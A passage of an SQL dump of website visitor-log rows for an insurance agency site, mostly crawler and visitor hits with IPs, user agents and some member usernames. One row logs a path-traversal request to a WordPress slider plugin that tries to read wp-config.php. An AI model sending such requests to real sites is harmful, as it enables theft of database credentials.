NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(592,'0b_05766a51a03253fe3d3a9463bda1442b','1457058072','50.74.50.37','rrcs-50-74-50-37.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(593,'0b_05766a51a03253fe3d3a9463bda1442b','1457058073','50.74.50.37','rrcs-50-74-50-37.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(596,'0b_05766a51a03253fe3d3a9463bda1442b','1457058143','50.74.50.37','rrcs-50-74-50-37.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(598,'0b_c7013e69c6669e08a97809b75a769020','1457058309','46.148.18.74','46.148.18.74','/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','Wget/1.16 (linux-gnu)','','',0,'','Wget 1','','','','Wget','','','','3','0',0),(599,'0b_b9ada5255fe902a735e345afcec452dc','1457059046','69.30.213.138','69.30.213.138','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(601,'0b_b9ada5255fe902a735e345afcec452dc','1457059057','69.30.213.138','69.30.213.138','/?p=277','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(602,'0b_b9ada5255fe902a735e345afcec452dc','1457059068','69.30.213.138','69.30.213.138','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(604,'0b_b9ada5255fe902a735e345afcec452dc','1457059080','69.30.213.138','69.30.213.138','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(607,'0b_10c2ef4401390dfd0723c91f673e04b5','1457059482','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/companylinks.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(610,'0b_5ee58618beac13a9895dd3245e8ea939','1457059888','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(613,'0b_0b7c4451eb7e03f1e56765f8043c1a56','1457061211','208.115.111.66','208-115-111-66-reverse.wowrack.com','/members/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(614,'0b_2b33ad2d158816ea55636c83c761e876','1457063623','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/igo','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(616,'0b_2b33ad2d158816ea55636c83c761e876','1457063635','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/igo/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(617,'0b_415b4dbe47b5e83ec9bcdd99b81e8400','1457064763','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/illustration.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(619,'0b_a39a7d303a6e51fdca57f307f51c6490','1457066773','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(622,'0b_f88484d7ed7eeb68e8775868729f218e','1457069877','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(625,'0b_91dc72d21f962aef12b8500757f07295','1457069883','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(628,'0b_30e62dab5484501b1168f05d137d415a','1457069907','157.55.39.236','msnbot-157-55-39-236.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(629,'0b_f88484d7ed7eeb68e8775868729f218e','1457069989','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(631,'0b_9a25d6a6c7b273e405dd4a5295dfb53c','1457070974','176.9.131.69','static.69.131.9.176.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(634,'0b_9a25d6a6c7b273e405dd4a5295dfb53c','1457070977','176.9.131.69','static.69.131.9.176.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(635,'0b_2ab734cbabf3c910d5aa735b0d6e52b5','1457071260','213.251.184.38','ns322237.ip-213-251-184.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(637,'0b_2ab734cbabf3c910d5aa735b0d6e52b5','1457071263','213.251.184.38','ns322237.ip-213-251-184.eu','/top.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(638,'0b_2ab734cbabf3c910d5aa735b0d6e52b5','1457071265','213.251.184.38','ns322237.ip-213-251-184.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(641,'0b_2ab734cbabf3c910d5aa735b0d6e52b5','1457071270','213.251.184.38','ns322237.ip-213-251-184.eu','/top.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(644,'0b_2ab734cbabf3c910d5aa735b0d6e52b5','1457071274','213.251.184.38','ns322237.ip-213-251-184.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(646,'0b_2ab734cbabf3c910d5aa735b0d6e52b5','1457071276','213.251.184.38','ns322237.ip-213-251-184.eu','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(647,'0b_2ab734cbabf3c910d5aa735b0d6e52b5','1457071279','213.251.184.38','ns322237.ip-213-251-184.eu','/products.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(650,'0b_50f54e7a8a532f7f526f337ab0f46799','1457071297','107.173.201.35','107-173-201-35-host.colocrossing.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36','http://www.empireins.com/','',0,'MacOSX','Chrome 39','us','','','','','','','0','0',0),(652,'0b_bcfa7a9608e3309f2e4abd45a1716442','1457074945','208.115.111.66','208-115-111-66-reverse.wowrack.com','/home/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(653,'0b_35d4c9cf189d8e63fdb4f11fc00c7b8c','1457078878','66.249.75.89','crawl-66-249-75-89.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(656,'0b_9372b3cd9f5229667318c2c8ffefdd2a','1457080733','157.55.39.236','msnbot-157-55-39-236.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(659,'0b_60b0a2abe4f0ebd289eb7f7ab9314ff1','1457080834','66.249.75.96','crawl-66-249-75-96.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(662,'0b_60b0a2abe4f0ebd289eb7f7ab9314ff1','1457080841','66.249.75.96','crawl-66-249-75-96.googlebot.com','/case-status/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(664,'0b_b42108d1c4c07b58f137384049a6cad3','1457082259','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/quotes.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(665,'0b_e1f60622b50d4f52d9141833a462075e','1457082691','89.145.95.42','centro-42.grapeshot.co.uk','/','Mozilla/5.0 (compatible; GrapeshotCrawler/2.0; +http://www.grapeshot.co.uk/crawler.php)','','',0,'','','gb','','','','','','','0','0',0),(667,'0b_2380eda1ddf304a4647a03344bef3660','1457082789','66.249.75.102','crawl-66-249-75-102.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(670,'0b_a5e0d02f019d94c4fc482525226d481e','1457082792','66.249.75.96','crawl-66-249-75-96.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(673,'0b_d51b30609835483e7288ef91a9792799','1457083934','66.249.75.103','crawl-66-249-75-103.googlebot.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(674,'0b_1737f07cc7993c164e20b5c26685ecb3','1457084891','66.249.75.96','crawl-66-249-75-96.googlebot.com','/igo/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(677,'0b_d42247469ad594c0debee0e2b2d2c47c','1457085282','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/SSO/235_18.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(680,'0b_a09411cd3b6ee38e6a790c6f51010a1d','1457086327','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(682,'0b_35a6482d71235dab7bf06789964ac40e','1457086576','66.249.75.96','crawl-66-249-75-96.googlebot.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(685,'0b_35a6482d71235dab7bf06789964ac40e','1457086822','66.249.75.89','crawl-66-249-75-89.googlebot.com','/contact/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(686,'0b_44b5344ce01075bd3bca78676b3b7996','1457087639','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(689,'0b_5462198b4779b1ce45584496be7a5648','1457087729','66.249.75.96','crawl-66-249-75-96.googlebot.com','/register/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(691,'0b_44b5344ce01075bd3bca78676b3b7996','1457088406','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(694,'0b_249080f55659f750f39c9fcf910969d4','1457088934','207.241.226.217','wwwb-app17.us.archive.org','/robots.txt','Mozilla/5.0 (compatible; archive.org_bot; Wayback Machine Live Record; +http://archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(695,'0b_436f60b37b8ba062cbbb07c55bf47363','1457088949','178.63.17.167','seo-de01.mcemcw.com','/','Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.7.10','','',0,'Win7','Firefox 3','ru','','','','','','','0','0',0),(697,'0b_edeeba33e761af1b0a6934a837e567da','1457089328','100.43.81.152','spider-100-43-81-152.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(698,'0b_adce53363943a756fb14871e93ef429a','1457091302','157.55.39.37','msnbot-157-55-39-37.search.msn.com','[404] /documents/NoMoreHassles.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(701,'0b_7919ceaa39549f9d200bc9d3cd3c46cf','1457091931','104.236.121.91','104.236.121.91','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0','','',0,'Win7 x64','Firefox 21','','','','','','','','0','0',0),(703,'0b_21486864edaa6306f7946c31a5d467f2','1457091949','104.236.121.91','104.236.121.91','/robots.txt','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36','','',0,'MacOSX','Chrome 35','','','','Unknown Spider','','','','0','0',0),(706,'0b_171292965d420634de1737cc8ec96751','1457091961','104.236.121.91','104.236.121.91','/register/','Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0','http://www.empireins.com','',0,'Win7','Firefox 28','','','','','','','','0','0',0),(707,'0b_21486864edaa6306f7946c31a5d467f2','1457091961','104.236.121.91','104.236.121.91','/about-us/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36','http://www.empireins.com','',0,'MacOSX','Chrome 35','','','','Unknown Spider','','','','0','0',0),(710,'0b_52e56e6aca6b7c536926a70bbc221ce3','1457091971','104.236.121.91','104.236.121.91','/carriers/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0','http://www.empireins.com','',0,'MacOSX','Firefox 29','','','','','','','','0','0',0),(713,'0b_b4cf0e3d4c665dd10ce9a9dcdc030421','1457091971','104.236.121.91','104.236.121.91','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com','',0,'Win7 x64','IE 10','','','','','','','','0','0',0),(715,'0b_a810a608fb84f9574ee878443ec046dd','1457092851','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(716,'0b_3acb0d8a14aa11fc49ed1cf73e6540bb','1457092856','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/top.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(718,'0b_4393448b51c71f26521e66ce45bb2ec8','1457099618','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1600 x 900','','','','','','0','0',0),(721,'0b_4393448b51c71f26521e66ce45bb2ec8','1457099620','24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1600 x 900','','','','','','0','0',0),(724,'0b_4393448b51c71f26521e66ce45bb2ec8','1457099625','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1600 x 900','','','','','','0','0',0),(727,'0b_4393448b51c71f26521e66ce45bb2ec8','1457099650','24.186.240.34','ool-18baf022.dyn.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1600 x 900','','','','','','0','51',0),(730,'0b_8d78e86c77aeaebaf2092ebda6455205','1457100618','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(731,'0b_8d78e86c77aeaebaf2092ebda6455205','1457100620','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(734,'0b_75b613b8d1b3c691760ddb28cee0413f','1457100696','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(737,'0b_75b613b8d1b3c691760ddb28cee0413f','1457100697','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(740,'0b_392a37aa1d7dce70c81ed9c19789baad','1457101749','66.249.75.89','crawl-66-249-75-89.googlebot.com','/register/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(743,'0b_07780b16824a6313b4b7cb21ba85ac8a','1457101801','66.249.75.103','crawl-66-249-75-103.googlebot.com','/case-status/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(745,'0b_6ef5d0fe616492344f518f574542531d','1457101876','66.249.75.96','crawl-66-249-75-96.googlebot.com','/igo/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(748,'0b_6ef5d0fe616492344f518f574542531d','1457101902','66.249.75.89','crawl-66-249-75-89.googlebot.com','/agent-tools/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(749,'0b_6ef5d0fe616492344f518f574542531d','1457102172','66.249.75.89','crawl-66-249-75-89.googlebot.com','/insentives/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(752,'0b_cfaa42105c5e79760868455f812ff0cb','1457102452','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(754,'0b_a78d1d0a666ae797e243ab0c3c2286fe','1457103147','173.220.69.210','ool-addc45d2.static.optonline.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win10','Chrome 48','us','','','','','','','0','0',0),(757,'0b_5059d7ec1fa59a624f7058d4ba36456e','1457103148','173.220.69.210','ool-addc45d2.static.optonline.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win10','Chrome 48','us','1680 x 1050','','','','imayer','','0','0',0),(758,'0b_5059d7ec1fa59a624f7058d4ba36456e','1457103150','173.220.69.210','ool-addc45d2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 48','us','1680 x 1050','','','','imayer','','0','0',0),(761,'0b_5059d7ec1fa59a624f7058d4ba36456e','1457103154','173.220.69.210','ool-addc45d2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 48','us','1680 x 1050','','','','imayer','','0','0',0),(763,'0b_73395cf82e522c21713cba5fde446a00','1457103574','66.249.83.209,24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google Favicon','','',0,'Win7','Firefox 6','','','','','','','','0','0',0),(766,'0b_77f67aae70ae4f9e127298457250c664','1457104655','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(767,'0b_77f67aae70ae4f9e127298457250c664','1457104657','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(770,'0b_77f67aae70ae4f9e127298457250c664','1457104661','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(773,'0b_c767b12e9ab89c449edd4cb3d342ca7e','1457104862','24.186.240.34','ool-18baf022.dyn.optonline.net','/?page_id=171','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1600 x 900','','','','','','3','0',0),(776,'0b_c767b12e9ab89c449edd4cb3d342ca7e','1457104862','24.186.240.34','ool-18baf022.dyn.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1600 x 900','','','','','','3','51',0),(779,'0b_c767b12e9ab89c449edd4cb3d342ca7e','1457104880','24.186.240.34','ool-18baf022.dyn.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/members/','',0,'Win7','Chrome 48','us','1600 x 900','','','','akepecs','','3','51',0),(781,'0b_c767b12e9ab89c449edd4cb3d342ca7e','1457104884','24.186.240.34','ool-18baf022.dyn.optonline.net','/members/?a=pwdchange','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/members/','',0,'Win7','Chrome 48','us','1600 x 900','','','','akepecs','','3','51',0),(784,'0b_c767b12e9ab89c449edd4cb3d342ca7e','1457104898','24.186.240.34','ool-18baf022.dyn.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/members/?a=pwdchange','',0,'Win7','Chrome 48','us','1600 x 900','','','','akepecs','','3','51',0),(785,'0b_6ce3a1e2a6ad8a80495723519f8e222f','1457105071','66.249.83.213,108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/quotes.htm','Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google Favicon','','',0,'Win7','Firefox 6','us','','','','','','','0','0',0),(788,'0b_a5751f8a276aa306791103d444852a8a','1457105272','144.76.80.151','static.151.80.76.144.clients.your-server.de','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF; BRI/1; .NET4.0C; .NET4.0E; Zune 4.7; .NET CLR 1.1.4322)','','',0,'Win7 x64','IE 10','de','','','','','','','0','0',0),(791,'0b_162f0b0093e1c97ae893fa02d0ad399a','1457106641','185.2.4.20','lhcp1020.webapps.net','/shop/js/mage/cookies.js','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','empireins.com/shop','',0,'WinXP','Chrome 5','us','','','','','','','3','0',0),(793,'0b_12ca0458ce9f63f1b6379385449b50e1','1457106866','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/members/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(794,'0b_3b299bda19e821c6aae2c2b93b372144','1457107345','157.55.39.236','msnbot-157-55-39-236.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(797,'0b_7330fb4eaa97b0c6424d9e7d3f005d06','1457107374','69.175.22.218','newscan02.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 